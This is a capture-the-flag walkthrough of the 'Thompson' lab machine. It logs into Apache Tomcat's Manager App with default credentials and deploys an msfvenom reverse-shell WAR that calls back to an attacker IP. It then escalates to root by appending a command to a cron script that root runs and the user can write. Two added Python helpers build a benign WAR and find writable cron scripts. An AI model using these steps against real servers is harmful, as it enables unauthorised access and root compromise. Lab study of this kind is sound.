Thompson


Last updated 3 years ago


Reconnaissance

Initial nmap scan to find open ports. The -Pn flag skips host discovery and treats the host as alive, so the port scan still runs if ping probes are blocked:

nmap -Pn 10.10.196.112

Detailed nmap scan of the three ports the first scan reported open (22, 8009, 8080):

Command breakdown:

  • -sV: probe for service versions

  • -sC: run the default NSE scripts

  • -p 22,8009,8080: scan only the ports already found open

  • -oN nmap: save normal-format output to a file called nmap

nmap -sV -sC -p 22,8009,8080 -oN nmap 10.10.196.112

Enumeration

Let's visit the site on port 8080.

It is the default Apache Tomcat landing page (port 8009 is Tomcat's AJP connector, so both ports belong to the same service). There is a Manager App button; let's click it and see what it says.

It prompts for a username and password, which we do not have yet. Clicking Cancel returns Tomcat's 401 error page.

That error page includes an example tomcat-users.xml entry with a username and password, and on this machine the administrator never changed them, so let's log in with those credentials.

We are logged in. Looking through the Application Manager, we see something interesting:

We can upload and deploy WAR files. Tomcat compiles and runs any JSP inside a deployed WAR as the Tomcat service account, so a WAR payload that opens a reverse shell gives us a shell on the machine.

Exploitation

Let's first make the payload with msfvenom. Replace the LHOST value with your own VPN address and pick a port you are able to listen on:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.13.8.64 LPORT=1234 -f war > reverse.war

Let's upload the file: under "WAR file to deploy", click Browse and select reverse.war.

Hit Deploy, and the new application should appear in the list of deployed applications.

Now let's start a netcat listener on the port we set as LPORT (1234).

Click the application's path in the list; Tomcat loads the JSP and the listener receives a reverse shell.
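What the Manager App accepts is any WAR archive, and a WAR is nothing more than a zip containing WEB-INF/web.xml plus the JSP pages Tomcat should compile. The script below builds one by hand so you can see the layout msfvenom produces and why clicking the application path runs the payload. It is an added example written for this writeup, not code from the original page or from Metasploit; the JSP body, the file name whoami.war and the application path /whoami/ are assumptions made for the demo.

```python
#!/usr/bin/env python3
"""Build a minimal Tomcat WAR by hand to see what the Manager App deploys.

Added example for this writeup, not code from the original page or from msfvenom.
A WAR is a zip archive: WEB-INF/web.xml describes the application and any .jsp in
it is compiled and executed by Tomcat under the Tomcat service account. msfvenom's
war format produces the same layout around a reverse-shell JSP; the JSP here only
reports which account it runs as, which is enough to confirm code execution on a
lab target before committing to a shell payload.
"""
import io
import zipfile

# Constructed JSP: prints the OS account Tomcat runs as. Harmless, but it proves
# that whatever we put in the WAR executes server-side.
WHOAMI_JSP = """<%
    out.println("running as: " + System.getProperty("user.name"));
%>
"""

# Deployment descriptor; the welcome-file makes GET /<app>/ run the JSP directly,
# which is why clicking the application path in the manager triggers the payload.
WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1">
  <welcome-file-list>
    <welcome-file>{jsp}</welcome-file>
  </welcome-file-list>
</web-app>
"""


def build_war(jsp_source=WHOAMI_JSP, jsp_name="index.jsp"):
    """Return the bytes of a deployable WAR holding web.xml and one JSP."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("WEB-INF/web.xml", WEB_XML.format(jsp=jsp_name))
        war.writestr(jsp_name, jsp_source)
    return buf.getvalue()


def war_entries(war_bytes):
    """List archive members, as `unzip -l reverse.war` would on msfvenom's output."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return sorted(war.namelist())


def jsp_names(war_bytes):
    """Return every JSP in the archive; each one is server-side code Tomcat will run."""
    return [name for name in war_entries(war_bytes) if name.endswith(".jsp")]


if __name__ == "__main__":
    data = build_war()
    with open("whoami.war", "wb") as fh:   # assumed output name for the demo
        fh.write(data)
    print("wrote whoami.war:", war_entries(data))
    # Deploy it through Manager App -> "WAR file to deploy", then browse to
    # http://<target>:8080/whoami/ and the page shows the Tomcat account name.
```

Run it, deploy whoami.war through the same upload form, and browse to the path it appears under; the response names the account Tomcat runs as, which tells you what privileges a reverse shell from the same WAR will inherit.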

Let's stabilize the shell with these commands (use python3 if python is not present on the box):

python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl + Z
stty raw -echo; fg
export TERM=xterm
reset

We are running as jack and can read the user.txt file in the home directory.

There are two other files in the directory, id.sh and test.txt; let's look at what they contain.

id.sh runs the id command and redirects its output into test.txt. Something must be running the script on a schedule, so let's check the cron jobs configured on this machine.

The system crontab runs /home/jack/id.sh as root, and jack can write that script. Anything we append to it executes as root on the next run, so let's have it copy the root flag into /home/jack, where we can read it.

We can edit the file with nano, or simply append the command:

echo "cp /root/root.txt /home/jack/root.txt" >> id.sh

Once the cron job fires again, root.txt appears in our directory and we can read it. One caveat: cp keeps the source file's permission bits, so if the copy arrives readable only by root, have the script also chmod the copy (or redirect cat output into the new file instead of copying) so that jack can read it.
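The root cron job is only useful because jack can write the script it executes. The following script, an added example written for this writeup and not part of the original page, turns that manual check into a reusable one: it parses system-crontab entries, resolves the script each command will run (including `cd DIR && bash script.sh` patterns like the one here) and reports the ones the current account can modify. The sample crontab inside it is constructed for the demo and is not Thompson's real /etc/crontab; the schedules and every path other than /home/jack/id.sh are assumptions.

```python
#!/usr/bin/env python3
"""Find cron jobs whose scripts the current user can modify.

Added example for this writeup, not code from the original page. It generalises the
manual check made on Thompson: a cron entry run by root is a privilege-escalation
path only when the script it executes (here /home/jack/id.sh) is writable by the
account we hold. SAMPLE_CRONTAB is constructed for the demo in /etc/crontab format
and is not the target's real crontab; against a live box pass the contents of
/etc/crontab and /etc/cron.d/* instead.
"""
import os
import shlex
import shutil

# Constructed sample in system-crontab format: m h dom mon dow user command.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
@reboot         root    /usr/local/bin/start-app.sh
*  *    * * *   root    cd /home/jack && bash id.sh
*/5 *   * * *   www-data /var/www/cleanup.sh --quiet
"""

SPECIALS = {"@reboot", "@hourly", "@daily", "@weekly", "@monthly", "@yearly", "@annually"}
INTERPRETERS = {"sh", "bash", "dash", "zsh", "python", "python2", "python3", "perl"}


def parse_crontab(text):
    """Return (user, command) pairs; comments, blank lines and VAR=value lines are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        # @reboot-style lines have one schedule field, normal lines have five.
        fields = line.split(None, 2) if line.split()[0] in SPECIALS else line.split(None, 6)
        if len(fields) in (3, 7):
            entries.append((fields[-2], fields[-1]))
    return entries


def script_candidates(command, cwd="/"):
    """Resolve the files a cron command line will execute.

    Follows `cd DIR && ...` chains and interpreter prefixes so that
    'cd /home/jack && bash id.sh' resolves to /home/jack/id.sh. Bare command
    names are looked up on PATH like cron's shell would; pipes are not modelled.
    """
    paths = []
    for segment in command.replace("||", "&&").replace(";", "&&").split("&&"):
        try:
            tokens = shlex.split(segment)
        except ValueError:
            continue  # unbalanced quotes: skip rather than guess
        if not tokens:
            continue
        if tokens[0] == "cd":
            cwd = tokens[1] if len(tokens) > 1 else cwd
            continue
        if os.path.basename(tokens[0]) in INTERPRETERS:
            args = [t for t in tokens[1:] if not t.startswith("-")]
            if not args:
                continue
            target = args[0]                    # `bash script.sh`: the script is the real target
        elif "/" not in tokens[0]:
            target = shutil.which(tokens[0])    # bare name: PATH lookup, as cron's shell does
            if target is None:
                continue
        else:
            target = tokens[0]
        paths.append(target if os.path.isabs(target) else os.path.normpath(os.path.join(cwd, target)))
    return paths


def writable_cron_scripts(crontab_text, is_writable=None):
    """Return (user, script) pairs for cron scripts our account can write.

    `is_writable` can be injected so the logic is checkable against the sample;
    by default it asks the kernel via os.access(path, os.W_OK).
    """
    if is_writable is None:
        is_writable = lambda path: os.access(path, os.W_OK)
    return [(user, path)
            for user, command in parse_crontab(crontab_text)
            for path in script_candidates(command)
            if is_writable(path)]


if __name__ == "__main__":
    for user, command in parse_crontab(SAMPLE_CRONTAB):
        for path in script_candidates(command):
            state = "WRITABLE" if os.access(path, os.W_OK) else "read-only or absent"
            print(f"{user:<9} {path:<35} {state}")
```

On a live box feed it the contents of /etc/crontab and /etc/cron.d/*, and also check whether the parent directory of each script is writable, since being able to replace the file is as good as being able to edit it.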